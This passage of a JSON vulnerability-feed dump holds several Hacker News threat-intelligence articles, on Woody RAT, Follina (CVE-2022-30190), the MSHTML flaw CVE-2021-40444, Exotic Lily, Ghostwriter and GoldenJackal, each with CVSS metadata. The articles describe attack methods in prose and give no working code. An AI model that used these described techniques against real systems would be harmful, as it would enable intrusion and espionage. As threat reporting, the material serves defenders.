[disclosed](<https://twitter.com/malwrhunterteam/status/1534184385313923072>) the use of a document named \"\u041f\u0430\u043c\u044f\u0442\u043a\u0430.docx\" (which translates to \"Memo.docx\") to deliver a CSS payload containing the trojan.\n\nThe document purportedly offers best security practices for passwords and confidential information, among others, while acting as a decoy for dropping the backdoor.\n\nBesides encrypting its communications with a remote server, Woody RAT is equipped with capabilities to write arbitrary files to the machine, execute additional malware, delete files, enumerate directories, capture screenshots, and gather a list of running processes.\n\nAlso embedded within the malware are two .NET-based libraries named WoodySharpExecutor and WoodyPowerSession that can be used to run .NET code and PowerShell commands received from the server, respectively.\n\nFurthermore, the malware makes use of the [process hollowing technique](<https://attack.mitre.org/techniques/T1055/012/>) to inject itself into a suspended Notepad process and deletes itself from the disk to evade detection from security software installed on the compromised host.\n\nMalwarebytes has yet to attribute the attacks to a specific threat actor, citing lack of solid indicators linking the campaign to a previously known group, although Chinese and North Korean nation-state collectives have targeted Russia in the past.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-04T12:55:00", "type": "thn", "title": "New Woody RAT Malware Being Used to Target Russian Organizations", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-08-05T05:42:05", "id": "THN:DFB68B1B6C2EFBB410EB54D83320B71C", "href": "https://thehackernews.com/2022/08/new-woody-rat-malware-being-used-to.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-01T11:56:12", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiUNLbMQKFGJkk_0MuvTZUsbdZk7Mwzi1ubRnWBoCLxeBkICJ8W6xX9SHPsYas7bLDtqj4wO1lZsmsxuPuAxkocOzNUvBMbOmM2yJIGg2t7CnMv5yAaUiSHpTbdt9nsHappGPYR_oG1nild6RLvcMvaILplweROkw7HFZp7QvCAE_V31Ku-G5wnnnZq/s728-e100/office.jpg>)\n\nAn advanced persistent threat (APT) actor aligned with Chinese state interests has been observed weaponizing the new [zero-day flaw](<https://thehackernews.com/2022/05/watch-out-researchers-spot-new.html>) in Microsoft Office to achieve code execution on affected systems.\n\n\"TA413 CN APT spotted [in-the-wild] exploiting the Follina zero-day using URLs to deliver ZIP archives which contain Word Documents that use the technique,\" enterprise security firm Proofpoint [said](<https://twitter.com/threatinsight/status/1531688214993555457>) in a tweet.\n\n\"Campaigns impersonate the 'Women Empowerments Desk' of the Central Tibetan Administration and use the domain tibet-gov.web[.]app.\"\n\n[TA413](<https://malpedia.caad.fkie.fraunhofer.de/actor/ta413>) is best known for its campaigns aimed at the Tibetan diaspora to deliver implants such as [Exile RAT](<https://malpedia.caad.fkie.fraunhofer.de/details/win.exilerat>) and [Sepulcher](<https://malpedia.caad.fkie.fraunhofer.de/details/win.sepulcher>) as well as a rogue Firefox browser extension dubbed [FriarFox](<https://thehackernews.com/2021/02/chinese-hackers-using-firefox-extension.html>).\n\nThe high-severity security flaw, dubbed Follina and tracked as CVE-2022-30190 (CVSS score: 7.8), relates to a case of remote code execution that abuses the \"ms-msdt:\" protocol URI scheme to execute arbitrary code.\n\nSpecifically, the attack makes it possible for threat actors to circumvent [Protected View](<https://support.microsoft.com/en-us/topic/what-is-protected-view-d6f09ac7-e6b9-4495-8e43-2bbcdbcb6653>) safeguards for suspicious files by simply changing the document to a Rich Text Format (RTF) file, thereby allowing the injected code to be run without even opening the document via the [Preview Pane](<https://docs.microsoft.com/en-us/windows/powertoys/file-explorer>) in Windows File Explorer.\n\nWhile the bug gained widespread attention last week, evidence points to active exploitation of the diagnostic tool flaw in real-world attacks targeting Russian users over a month ago on April 12, 2022, when it was disclosed to Microsoft.\n\nThe company, however, [did not deem it a security issue](<https://thehackernews.com/2022/05/microsoft-releases-workarounds-for.html>) and closed the vulnerability submission report, citing reasons that the MSDT utility requires a [passkey](<https://social.technet.microsoft.com/wiki/contents/articles/30458.windows-10-ctp-how-to-run-microsoft-support-diagnostic-tool.aspx#How_shall_I_get_the_Passkey>) provided by a support technician before it can execute payloads.\n\nThe vulnerability exists in all currently supported Windows versions and can be exploited via Microsoft Office versions Office 2013 through Office 21 and Office Professional Plus editions.\n\n\"This elegant attack is designed to bypass security products and fly under the radar by leveraging Microsoft Office's remote template feature and the ms-msdt protocol to execute malicious code, all without the need for macros,\" Malwarebytes' Jerome Segura [noted](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/05/microsoft-office-zero-day-follina-its-not-a-bug-its-a-feature-its-a-bug/>).\n\nAlthough there is no official patch available at this point, Microsoft has [recommended](<https://thehackernews.com/2022/05/microsoft-releases-workarounds-for.html>) disabling the MSDT URL protocol to prevent the attack vector. Additionally, it's been [advised](<https://twitter.com/wdormann/status/1531259406624620544>) to turn off the Preview Pane in File Explorer.\n\n\"What makes 'Follina' stand out is that this exploit does not take advantage of Office macros and, therefore, it works even in environments where macros have been disabled entirely,\" Nikolas Cemerikic of Immersive Labs said.\n\n\"All that's required for the exploit to take effect is for a user to open and view the Word document, or to view a preview of the document using the Windows Explorer Preview Pane. Since the latter does not require Word to launch fully, this effectively becomes a zero-click attack.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {}, "published": "2022-06-01T06:02:00", "type": "thn", "title": "Chinese Hackers Begin Exploiting Latest Microsoft Office Zero-Day Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-01T10:00:06", "id": "THN:D9A5562FBD56B3B0FF85376C9BCF0A10", "href": "https://thehackernews.com/2022/05/chinese-hackers-begin-exploiting-latest.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-07-21T15:55:37", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEhTDhGSCLFNoe2MDkuwd-dbu3bKqPHtCuuSNeeosLJmQdiXnE3Hq_M2wsCJ9OqEk2ig0Jn0ITJ4RW9LkqUzEeWCBF6R1H6SS_wGXq_pLI3Y38VenthyRa2AlQQkCDlvzat6a-UDOxxvG3p-0r9ppLP1GKrMXdqPUW28Q6TZDz8v57TTuwc6KS6gi8pJ>)\n\nGoogle's Threat Analysis Group (TAG) took the wraps off a new [initial access broker](<https://thehackernews.com/2021/11/blackberry-uncover-initial-access.html>) that it said is closely affiliated to a Russian cyber crime gang notorious for its Conti and Diavol ransomware operations.\n\nDubbed Exotic Lily, the financially motivated threat actor has been observed exploiting a now-patched critical flaw in the Microsoft Windows MSHTML platform ([CVE-2021-40444](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>)) as part of widespread phishing campaigns that involved sending no fewer than 5,000 business proposal-themed emails a day to 650 targeted organizations globally.\n\n\"Initial access brokers are the opportunistic locksmiths of the security world, and it's a full-time job,\" TAG researchers Vlad Stolyarov and Benoit Sevens [said](<https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/>). \"These groups specialize in breaching a target in order to open the doors \u2014 or the Windows \u2014 to the malicious actor with the highest bid.\"\n\nExotic Lily, first spotted in September 2021, is said to have been involved in data exfiltration and deployment of the human-operated Conti and [Diavol](<https://thehackernews.com/2021/08/researchers-find-new-evidence-linking.html>) ransomware strains, both of which share overlaps with Wizard Spider, the Russian cyber criminal syndicate that's also known for operating [TrickBot](<https://thehackernews.com/2022/03/trickbot-malware-abusing-hacked-iot.html>), [BazarBackdoor](<https://thehackernews.com/2021/07/phony-call-centers-tricking-users-into.html>), and [Anchor](<https://thehackernews.com/2022/03/trickbot-malware-gang-upgrades-its.html>).\n\n\"Yes, this is a possibility, especially considering this is more sophisticated and targeted than a traditional spam campaign, but we don't know for sure as of now,\" Google TAG told The Hacker News when asked whether Exotic Lily could be another extension of the Wizard Spider group.\n\n\"In the [Conti leaks](<https://thehackernews.com/2022/03/conti-ransomware-gangs-internal-chats.html>), Conti members mention 'spammers' as someone who they work with (e.g., provide custom-built 'crypted' malware samples, etc.) through outsourcing. However, most of the 'spammers' don't seem to be present (or actively communicate) in the chat, hence leading to a conclusion they're operating as a separate entity.\"\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEiRLlObJVyztso8c0_EbePqlTPrjHuRu1-NWCjxiV47unTWyXRykIMkEo4lnhKEbWUZSP4zUPmn3jo-N6O4gz5CgskYHypFzEWSI4djVkBE6Gle_kwlb7Mp7tQN5cmk2BPWhrXILnSvxl38u2qgqfAntvF85WiXMyt0WIn_ikXRHLwk6apNoOd64qob>)\n\nThe threat actor's social engineering lures, sent from spoofed email accounts, have specifically singled out IT, cybersecurity, and healthcare sectors, although post November 2021, the attacks have grown to be more indiscriminate, targeting a wide variety of organizations and industries.\n\nBesides using fictitious companies and identities as a means to build trust with the targeted entities, Exotic Lily has leveraged legitimate file-sharing services like WeTransfer, TransferNow and OneDrive to deliver [BazarBackdoor payloads](<https://abnormalsecurity.com/blog/bazarloader-contact-form>) in a bid to evade detection mechanisms.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEjD7gTpku0C6R-pc9VwoTyiLgYiON0B6dyOqyFgyXxeXOTvF5CYHGGGVF3SC9He4ccMof89UgDp1tK7Xuin_iXJUH3yaRAFHQbBlmFKaz-VMRRWlsJZkQMC2Nsov-UnJQdUe37HX901rV208dbe-xqakcZ50w5XWf02Ldv4BMHbCtI-It_dm8dsiLFc>)\n\nThe rogue personas often posed as employees of firms such as Amazon, complete with fraudulent social media profiles on LinkedIn that featured fake AI-generated profile pictures. The group is also said to have impersonated real company employees by lifting their personal data from social media and business databases like RocketReach and CrunchBase.\n\n\"At the final stage, the attacker would upload the payload to a public file-sharing service (TransferNow, TransferXL, WeTransfer or OneDrive) and then use a built-in email notification feature to share the file with the target, allowing the final email to originate from the email address of a legitimate file-sharing service and not the attacker's email, which presents additional detection challenges,\" the researchers said.\n\nAlso delivered using the MHTML exploit is a custom loader called Bumblebee that's orchestrated to gather and exfiltrate system information to a remote server, which responds back commands to execute shellcode and run next-stage executables, including Cobalt Strike.\n\nAn analysis of the Exotic Lily's communication activity indicates that the threat actors have a \"typical 9-to-5 job\" on weekdays and may be possibly working from a Central or an Eastern Europe time zone.\n\n\"Exotic Lily seems to operate as a separate entity, focusing on acquiring initial access through email campaigns, with follow-up activities that include deployment of Conti and Diavol ransomware, which are performed by a different set of actors,\" the researchers concluded.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-18T07:31:00", "type": "thn", "title": "Google Uncovers 'Initial Access Broker' Working with Conti Ransomware Gang", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-07-21T13:32:08", "id": "THN:959FD46A8D71CA9DDAEDD6516113CE3E", "href": "https://thehackernews.com/2022/03/google-uncovers-initial-access-broker.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-05T03:38:09", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjI291J10LW67nc2C0UITCwpnhtduhMMY8ndL7-O83eu0zDh2WUIKe9oQiLkdnGI3y197Sqw_347ZW1fDrAE20TW48AvjuRlbQs4jajAbPaCjJbtzYHF8r5WHSfDMS_3mNTO-vTSDdTv2WKNT9BNnzfC2vPEosQs6BTjTvxD329uaye72syjHXguduS/s728-e100/flag.jpg>)\n\nA Belarusian threat actor known as Ghostwriter (aka UNC1151) has been spotted leveraging the recently disclosed browser-in-the-browser (BitB) technique as part of their credential phishing campaigns exploiting the ongoing Russo-Ukrainian conflict.\n\nThe method, which [masquerades](<https://thehackernews.com/2022/03/new-browser-in-browser-bitb-attack.html>) as a legitimate domain by simulating a browser window within the browser, makes it possible to mount convincing social engineering campaigns.\n\n\"Ghostwriter actors have quickly adopted this new technique, combining it with a previously observed technique, hosting credential phishing landing pages on compromised sites,\" Google's Threat Analysis Group (TAG) [said](<https://blog.google/threat-analysis-group/tracking-cyber-activity-eastern-europe/>) in a new report, using it to siphon credentials entered by unsuspected victims to a remote server.\n\nAmong other groups [using the war as a lure](<https://thehackernews.com/2022/03/google-russian-hackers-target.html>) in phishing and malware campaigns to deceive targets into opening fraudulent emails or links include [Mustang Panda](<https://thehackernews.com/2022/03/chinese-mustang-panda-hackers-spotted.html>) and [Scarab](<https://thehackernews.com/2022/03/another-chinese-hacking-group-spotted.html>) as well as nation-state actors from Iran, North Korea, and Russia.\n\nAlso included in the list is Curious Gorge, a hacking crew that TAG has attributed to China's People's Liberation Army Strategic Support Force (PLASSF), which has orchestrated attacks against government and military organizations in Ukraine, Russia, Kazakhstan, and Mongolia.\n\nA third set of attacks observed over the past two-week period originated from a Russia-based hacking group known as COLDRIVER (aka Callisto). TAG said that the actor staged credential phishing campaigns targeting multiple U.S.-based NGOs and think tanks, the military of a Balkans country, and an unnamed Ukrainian defense contractor.\n\n\"However, for the first time, TAG has observed COLDRIVER campaigns targeting the military of multiple Eastern European countries, as well as a NATO Centre of Excellence,\" TAG researcher Billy Leonard said. \"These campaigns were sent using newly created Gmail accounts to non-Google accounts, so the success rate of these campaigns is unknown.\"\n\n### Viasat breaks down February 24 Attack\n\nThe disclosure comes as U.S.-based telecommunications firm Viasat spilled details of a \"multifaceted and deliberate\" cyber attack against its KA-SAT network on February 24, 2022, coinciding with Russia's military invasion of Ukraine.\n\nThe attack on the satellite broadband service disconnected tens of thousands of modems from the network, impacting several customers in Ukraine and across Europe and affecting the [operations of 5,800 wind turbines](<https://www.reuters.com/business/energy/satellite-outage-knocks-out-control-enercon-wind-turbines-2022-02-28/>) belonging to the German company Enercon in Central Europe.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjBPeFDF2b99SCr6BVB_zZ-LCkJ_Z4VIMJJ2_hv0dUXzJcbyh_0y2xuG6Ih-wOEDAAPScYYXNZFPIRH4HldJI-VuJV3m-fvIGibDE8t_PLlac8yuJ61A4gBdKQp6TWVpKqVMIRJm7Yxt_9F3F0hbUWlh8rMT48xechHXRrjEbMDZ2TLWlcobJPrpxEq/s728-e100/phishing.jpg>)\n\n\"We believe the purpose of the attack was to interrupt service,\" the company [explained](<https://www.viasat.com/about/newsroom/blog/ka-sat-network-cyber-attack-overview/>). \"There is no evidence that any end-user data was accessed or compromised, nor customer personal equipment (PCs, mobile devices, etc.) was improperly accessed, nor is there any evidence that the KA-SAT satellite itself or its supporting satellite ground infrastructure itself were directly involved, impaired or compromised.\"\n\nViasat linked the attack to a \"ground-based network intrusion\" that exploited a misconfiguration in a VPN appliance to gain remote access to the KA-SAT network and execute destructive commands on the modems that \"overwrote key data in flash memory,\" rendering them temporarily unable to access the network.\n\n### Russian dissidents targeted with Cobalt Strike\n\nThe relentless attacks are the latest in a long list of malicious cyber activities that have emerged in the wake of the continuing conflict in Eastern Europe, with government and commercial networks suffering from a string of disruptive [data wiper infections](<https://thehackernews.com/2022/03/caddywiper-yet-another-data-wiping.html>) in conjunction with a series of ongoing distributed denial-of-service (DDoS) attacks.\n\nThis has also taken the form of compromising legitimate WordPress sites to inject rogue JavaScript code with the goal of carrying out DDoS attacks against Ukrainian domains, according to [researchers](<https://twitter.com/malwrhunterteam/status/1508517334239043584>) from the MalwareHunterTeam.\n\nBut it's not just Ukraine. Malwarebytes Labs this week laid out specifics of a new spear-phishing campaign targeting Russian citizens and government entities in an attempt to deploy pernicious payloads on compromised systems.\n\n\"The spear phishing emails are warning people that use websites, social networks, instant messengers and VPN services that have been banned by the Russian Government and that criminal charges will be laid,\" Hossein Jazi [said](<https://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/>). \"Victims are lured to open a malicious attachment or link to find out more, only to be infected with Cobalt Strike.\"\n\nThe malware-laced RTF documents contain an exploit for the widely abused MSHTML remote code execution vulnerability ([CVE-2021-40444](<https://thehackernews.com/2022/01/hackers-exploited-mshtml-flaw-to-spy-on.html>)), leading to the execution of a JavaScript code that spawns a PowerShell command to download and execute a Cobalt Strike beacon retrieved from a remote server.\n\nAnother cluster of activity potentially relates to a Russian threat actor tracked as Carbon Spider (aka [FIN7](<https://thehackernews.com/2021/10/hackers-set-up-fake-company-to-get-it.html>)), which has employed a similar maldocs-oriented attack vector that's engineered to drop a PowerShell-based backdoor capable of fetching and running a next-stage executable.\n\nMalwarebytes also said it has detected a \"significant uptick in malware families being used with the intent of stealing information or otherwise gaining access in Ukraine,\" including [Hacktool.LOIC](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=HackTool%3AWin32%2FOylecann.A>), [Ainslot Worm](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Worm:Win32/Ainslot.A!reg>), FFDroider, [Formbook](<https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook>), [Remcos](<https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos>), and [Quasar RAT](<https://lab52.io/blog/another-cyber-espionage-campaign-in-the-russia-ukrainian-ongoing-cyber-attacks/>).\n\n\"While these families are all relatively common in the cybersecurity world, the fact that we witnessed spikes almost exactly when Russian troops crossed the Ukrainian border makes these developments interesting and unusual,\" Adam Kujawa, director of Malwarebytes Labs, said in a statement shared with The Hacker News.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-31T13:02:00", "type": "thn", "title": "Hackers Increasingly Using 'Browser-in-the-Browser' Technique in Ukraine Related Attacks", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-05-05T02:23:33", "id": "THN:4E80D9371FAC9B29044F9D8F732A3AD5", "href": "https://thehackernews.com/2022/03/hackers-increasingly-using-browser-in.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:20", "description": "[](<https://thehackernews.com/images/-KnvkhCvOrtg/YTgvMst2aSI/AAAAAAAADvs/ibzrIC7hu6wR3f2vrtI3U2rW7SVg6UbKQCLcBGAsYHQ/s0/microsoft-office-hack.jpg>)\n\nMicrosoft on Tuesday warned of an actively exploited zero-day flaw impacting Internet Explorer that's being used to hijack vulnerable Windows systems by leveraging weaponized Office documents.\n\nTracked as CVE-2021-40444 (CVSS score: 8.8), the remote code execution flaw is rooted in MSHTML (aka Trident), a proprietary browser engine for the now-discontinued Internet Explorer and which is used in Office to render web content inside Word, Excel, and PowerPoint documents.\n\n\"Microsoft is investigating reports of a remote code execution vulnerability in MSHTML that affects Microsoft Windows. Microsoft is aware of targeted attacks that attempt to exploit this vulnerability by using specially-crafted Microsoft Office documents,\" the company [said](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>).\n\n\"An attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine. The attacker would then have to convince the user to open the malicious document. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights,\" it added.\n\nThe Windows maker credited researchers from EXPMON and Mandiant for reporting the flaw, although the company did not disclose additional specifics about the nature of the attacks, the identity of the adversaries exploiting this zero-day, or their targets in light of real-world attacks.\n\nEXPMON, in a [tweet](<https://twitter.com/EXPMON_/status/1435309115883020296>), noted it found the vulnerability after detecting a \"highly sophisticated zero-day attack\" aimed at Microsoft Office users, adding it passed on its findings to Microsoft on Sunday. \"The exploit uses logical flaws so the exploitation is perfectly reliable (&amp; dangerous),\" EXPMON researchers said.\n\nHowever, it's worth pointing out that the current attack can be suppressed if Microsoft Office is run with default configurations, wherein documents downloaded from the web are opened in [Protected View](<https://support.microsoft.com/en-us/topic/what-is-protected-view-d6f09ac7-e6b9-4495-8e43-2bbcdbcb6653>) or [Application Guard for Office](<https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/install-app-guard?view=o365-worldwide>), which is designed to prevent untrusted files from accessing trusted resources in the compromised system.\n\nMicrosoft, upon completion of the investigation, is expected to either release a security update as part of its Patch Tuesday monthly release cycle or issue an out-of-band patch \"depending on customer needs.\" In the interim, the Windows maker is urging users and organizations to disable all ActiveX controls in Internet Explorer to mitigate any potential attack.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-08T03:37:00", "type": "thn", "title": "New 0-Day Attack Targeting Windows Users With Microsoft Office Documents", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-08T04:55:07", "id": "THN:D4E86BD8938D3B2E15104CA4922A51F8", "href": "https://thehackernews.com/2021/09/new-0-day-attack-targeting-windows.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-24T10:20:50", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjKx6lnebkMoVxrD6i2a9kHJMAK5StxF6UxajtGC-QKg5H7keNnKCBTpf-Bd8WwGeUEEfMG2Ggx08MrkhJWyUl22L9HcF5u4bQjfUVvL0VUOr0pFg3D_XL31sY-zLG7VDiFGPVTewvqYAqdOJK9m6gUKqO6V3YHg5ylRQkhbSZxgEioqOxwvUsuvejm/s728-e365/hackers.jpg>)\n\nGovernment and diplomatic entities in the Middle East and South Asia are the target of a new advanced persistent threat actor named **GoldenJackal**.\n\nRussian cybersecurity firm Kaspersky, which has been [keeping tabs](<https://securelist.com/goldenjackal-apt-group/109677/>) on the group's activities since mid-2020, characterized the adversary as both capable and stealthy.\n\nThe targeting scope of the campaign is focused on Afghanistan, Azerbaijan, Iran, Iraq, Pakistan, and Turkey, infecting victims with tailored malware that steals data, propagates across systems via removable drives, and conducts surveillance.\n\nGoldenJackal is suspected to have been active for at least four years, although little is known about the group. Kaspersky said it has been unable to determine its origin or affiliation with known threat actors, but the actor's modus operandi suggests an espionage motivation.\n\nWhat's more, the threat actor's attempts to maintain a low profile and disappear into the shadows bears all the hallmarks of a state-sponsored group.\n\nThat said, some tactical overlaps have been observed between the threat actor and [Turla](<https://thehackernews.com/2023/05/us-government-neutralizes-russias-most.html>), one of Russia's [elite nation-state hacking crews](<https://www.wired.com/story/turla-history-russia-fsb-hackers/>). In one instance, a victim machine was infected by Turla and GoldenJackal two months apart.\n\nThe exact initial path employed to breach targeted computers is unknown at this stage, but evidence gathered so far points to the use of trojanized Skype installers and malicious Microsoft Word documents.\n\nWhile the installer serves as a conduit to deliver a .NET-based trojan called JackalControl, the Word files have been observed weaponizing the [Follina vulnerability](<https://thehackernews.com/2022/06/state-backed-hackers-exploit-microsoft.html>) ([CVE-2022-30190](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>)) to drop the same malware.\n\nJackalControl, as the name indicates, enables the attackers to remotely commandeer the machine, execute arbitrary commands, as well as upload and download from and to the system.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhX4xXiopFD7kY0eMtwKUzmwJ9yEJOldW4unujyer5BqYZeccOBwGgencFn_P38MZTiYFquMCRF-Tq9hIhEX_z6Bx9TsPJeRsdYa-u1HfL4Zg61fkA2fhI9LUcVFR15RcFLUjeJ8LaLYUwCemRwCs3NNZd2s0vIxG8CfsS2UKdhaI06y7bRDpciT7mE/s728-e365/map.jpg>) \n--- \nGeography of victims \n \nSome of the other malware families deployed by GoldenJackal are as follows -\n\n * **JackalSteal** \\- An implant that's used to find files of interest, including those located in removable USB drives, and transmit them to a remote server.\n * **JackalWorm** \\- A worm that's engineered to infect systems using removable USB drives and install the JackalControl trojan.\n * **JackalPerInfo** \\- A malware that comes with features to harvest system metadata, folder contents, installed applications, and running processes, and credentials stored in web browser databases.\n * **JackalScreenWatcher** \\- A utility to grab screenshots based on a preset time interval and send them to an actor-controlled server.\n\nAnother notable aspect of the threat actor is its reliance on hacked WordPress sites as a relay to forward web requests to the actual command-and-control (C2) server by means of a rogue PHP file injected into the websites.\n\n\"The group is probably trying to reduce its visibility by limiting the number of victims,\" Kaspersky researcher Giampaolo Dedola said. \"Their toolkit seems to be under development \u2013 the number of variants shows that they are still investing in it.\"\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-05-23T15:30:00", "type": "thn", "title": "GoldenJackal: New Threat Group Targeting Middle Eastern and South Asian Governments", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": 